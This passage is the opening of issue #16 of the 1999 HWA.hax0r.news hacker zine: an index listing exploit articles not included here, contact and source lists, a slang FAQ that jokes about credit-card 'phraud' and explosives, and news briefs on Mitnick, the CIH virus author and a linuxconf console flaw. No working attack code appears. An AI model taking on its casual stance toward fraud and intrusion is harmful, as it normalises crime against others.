💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn16.… captured on 2022-01-08 at 15:59:17.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 16 Volume 1 1999 May 1st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #16
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #16
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Telecardnews site, phone card and smartcard cracking.............
04.0 .. Coldfusion mole.cfm..............................................
05.0 .. More info on the CIH virus.......................................
06.0 .. E-Commerce is still taking it in the gnards......................
06.1 .. E-commerce boom fueling Security Holes?.........................
07.0 .. Anonymity guaranteed (PCworld)...................................
07.1 .. Anonymity guaranteed (Zero Knowledge Systems)....................
07.2 .. The ZKS white paper..............................................
08.0 .. Mitnick's accomplice Lewis DePayne, pleads guilty................
09.0 .. Biometric databases?.Not according to this report... ............
10.0 .. In the wake of CIH ..............................................
10.1 .. CIH 1.2 Virus Hits Few ..........................................
11.0 .. Lockdown2000 review by BHZ ......................................
12.0 .. ICQ99 Vulnerabilities and exploits...............................
12.1 .. ICQ Homepage Exploit.............................................
13.0 .. Possible DoS in WinNT RAS (PPTP).................................
14.0 .. MFT problem could cause you to reformat drive (NTFS).............
15.0 .. FireWalking a paper on determining Gateway Access Control Lists..
16.0 .. IGMP+8 fragmentation attack for Linux ...........................
17.0 .. local XFree 3.3.3 symlink root compromise..(freeBSD+others)......
18.0 .. Microsoft Outlook Express internet zone vulnerability............
19.0 .. Big Brother 1.09b/c security notice..............................
20.0 .. "Cyborg Seeks Community" by Steve Mann, wearable cpus anyone?....
20.1 .. :School For Cyborgs: By Steve Ditlea (sidebar to above article)..
21.0 .. Anonymizing UNIX systems white paper by van Hauser/THC...........
22.0 .. Ffingerd vulnerability...........................................
23.0 .. DoS in IRC services..............................................
24.0 .. New Java bug creates DoS for Win9x...............................
25.0 .. QPOP 2.4b2 _demo_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1
26.0 .. BSDI IMAP2BIS remote root exploit................................
27.0 .. Infod AIX exploit................................................
28.0 .. Cold fusion exploit scanner......................................
29.0 .. Updated CGI scanner scans for vulnerable servers scans 43 probs..
30.0 .. MS Outlook has potential reply-to spoofing vulnerability.........
31.0 .. Bash parsing vulnerability.......................................
32.0 .. NetBSD Security Advisory 1999-009................................
33.0 .. Explorer favicon.ico bug introduces new vulnerabilty.............
34.0 .. Cert: The Good Guys? (old boys network, reads like an ad for CERT)
35.0 .. NASA finds scapegoat? - Programmer indicted......................
36.0 .. CIH author found?................................................
37.0 .. INTEL goes after Zero Knowledge Systems..........................
38.0 .. NT-Exceed DoS....................................................
39.0 .. NT4 Trojaned Profiles............................................
40.0 .. Microsoft's web site virus haven! ...............................
41.0 .. New viruses from http://www.wopr.com.............................
42.0 .. Caldera COAS leaves shadow password file readable................
43.0 .. NT4+SP4 filename length vulnerabilty.............................
44.0 .. CSMMail Windows SMTP Server Remote Buffer Overflow Exploit.......
45.0 .. HP Sendmail 8.8.6 DoS............................................
46.0 .. KKI inactive connections advisory................................
47.0 .. How to achieve the status JP has with AntiOnline (from PacketStorm)
48.0 .. Windows thread overrun from a Java Applet........................
49.0 .. Phone Rangers break into GTE.....................................
50.0 .. Police question CIH virus creator................................
51.0 .. [ISN] The Virus Vault............................................
52.0 .. [ISN] The Bad Guys are Crackers..................................
53.0 .. [ISN] Email threats could bring down a 10yr jail term............
54.0 .. [ISN] Singapore ISP scans customer computers for vulnerabilities.
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
HOW.TO .. "How to hack" by our illustrious editor.........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD ..............................<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+........................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+........................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+........................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+........................<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net ech0 Security">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Free Keving demonstrations
From Project Gamma http://www.projectgamma.com/
April 30, 1999, 16:49
Author: WHiTe VaMPiRe
Demonstrations are being planned for Friday, June 4 in front of courthouses nationwide beginning at 2 PM to protest the unjust imprisonment
of Kevin Mitnick.
Kevin Mitnick has been held in a pre-trial facility since February 15, 1995, four years, without even a bail hearing. What did he do? Murder,
rape? No. He has been imprisoned for four years without even a bail hearing for possession of software allegedly worth millions of dollars.
However, the companies asserting this have never proven these claims nor have they reported these "losses" to their stockholders, as is
required by law.
Computer and legal experts agree that it is unlikely that any real damage occurred. The high numbers assume that every file and its associated
research were wiped from existence. In truth, no such damage was ever reported. Yet, Kevin Mitnick remains imprisoned as if this actually
happened.
Related links:
Free Kevin Demonstration
http://www.kevinmitnick.com/demo/index.html
Mitnick documents exposed (included in previous issues)
http://www.projectgamma.com/news/archive/1999/april/042499-1416.html
++ Possible Linuxconf Vulnerability (local console)
Approved-By: aleph1@UNDERGROUND.ORG
Date: Thu, 29 Apr 1999 18:45:40 -0400
Reply-To: The Nefarious Type <prestochango@ANTIONLINE.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: The Nefarious Type <prestochango@ANTIONLINE.COM>
Subject: Possible Linuxconf Vulnerability
To: BUGTRAQ@netspace.org
An older version of linuxconf was packaged with Redhat 5.1 and I had
not run into any problems with that version. But after installing the latest
version (linuxconf-1.13r15-1) onto OpenLinux 1.3, I came upon a problem during
boot. It had not detected /sbin/clock, so a menu appeared during boot and asked
if I wanted to change this. This happened all before I was even prompted for a
login.
The fact that someone who has physical access to the server can
access linuxconf (which by default, can only be used under root) is kind of
disturbing. So far, I have not been able to exploit this problem, though I'm
guessing that it could be done (e.g. from that menu, access user configuration,
etc.).
Linuxconf Homepage
http://www.solucorp.qc.ca/linuxconf/
-PrestoChango
++ Computer Student Wrote Chernobyl Virus to Humiliate Antivirus Providers
Contributed by Spikeman
Chen Ing-hau, a 24-year-old computer student, has been arrested in
Taiwan for creating the Chernobyl computer virus. Police said that Chen
may not be charged with a crime. If he did not intend to spread the
virus, he could avoid criminal charges, but if charged and convicted,
Chen faces up to three years in prison under Taiwanese law. The question
of civil liability still looms large for Chen, whose virus damaged
600,000 personal computers worldwide when it was triggered on April 26.
(The Boston Globe --
http://www.boston.com/dailynews2/120/economy/Computer_student_wrote_Chernob:.shtml)
++ NO COMMENT
From HNS http://www.net-security.org/
by BHZ, Friday 30th Apr 1999 on 3:36 pm CET
24.04.1999 Croatian Internet users were striking against HiNet, well known Croatian
monopolistic ISP. On that day all strike supporters didn't connect to the Internet.
HiNet didn't give any information or statistics about success or failing of our strike.
Yesterday some good (but not so good) news came. They will charge our telephone
impulses on local base (3 times cheaper then the "old" 077 number calls). OK, we
were happy that we have succeeded in one step of our plans, but chilling shocker
struck us. From 1st May prices of all telephone impulses will grow 30%. What could
we say about it? We will continue our protests in order to bring quality and price of
Croatian Internet connection to some western standards.
++ Summercon 99
(From HNN)
Contributed by Weld Pond
It is that time again. Presented by r00t and Phrack
Magazine Summercon99 will be held at the Omni Hotel,
part of the CNN Center in downtown Atlanta. Admission
is FREE (Feds and Press must pay) and everyone is
invited!
HNN Cons Page http://www.hackernews.com/cons/cons.html
++ On Packetstorm;
"The New Hacker's Dictionary v4.1.2" - The Jargon File is the definitive lexicon of Internet and hacker
slang, history, folklore, tradition, and humor. This is the latest
version (4.1.2), released on 4/28/99. Almost 10 MB of hacker jargon! By Eric Raymond.
http://www.Genocide2600.com/~tattooman/hacking-textfiles/jargon-4.1.2/ (Various formats)
++ Online banking system crashed
From www.403-security.org
http://www.403-security.org/Htmls/news.htm
By Astral 29.04.1999 12:13
Computer glitch is preventing lot of users to use CheckFree Holdings Corp. online bill payment systems using
programs such as MS.Money for accessing their accounts.Check Free spokesman sad that it isn't known when
system is going to be fixed and ready for using. For now about 350 banks cannot use online paying services
.Reason of this glitch ins't known yet, system could be hacked or just some technical problems.
Sorry no links for this story
++ Ministry Launches Cyber Attack?
From HNN http://www,hackernews.com/ April29th
contributed by sunny
The Ministry of Home Affairs in Singapore is being
accused of breaking into the personal computer of a
National University of Singapore law student. Ms Anne
Lee, 21, is claiming that her SingNet account was
broken into on 10 occasions in four days about two
weeks ago. According to a protection program called
Jammer, which was installed on the machine the IP
address of the attack belonged to the Ministry of Home
Affairs. The National Computer Board's assistant director
of IT security, Mr Goh Seow Hiong, said "It is very
difficult to change the IP address unless the person has
very sophisticated skills." (Bwahahahahahaha)
The Straits Times
http://straitstimes.asia1.com.sg/sin/sin2_0429.html
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
++ Ministry does scan machines
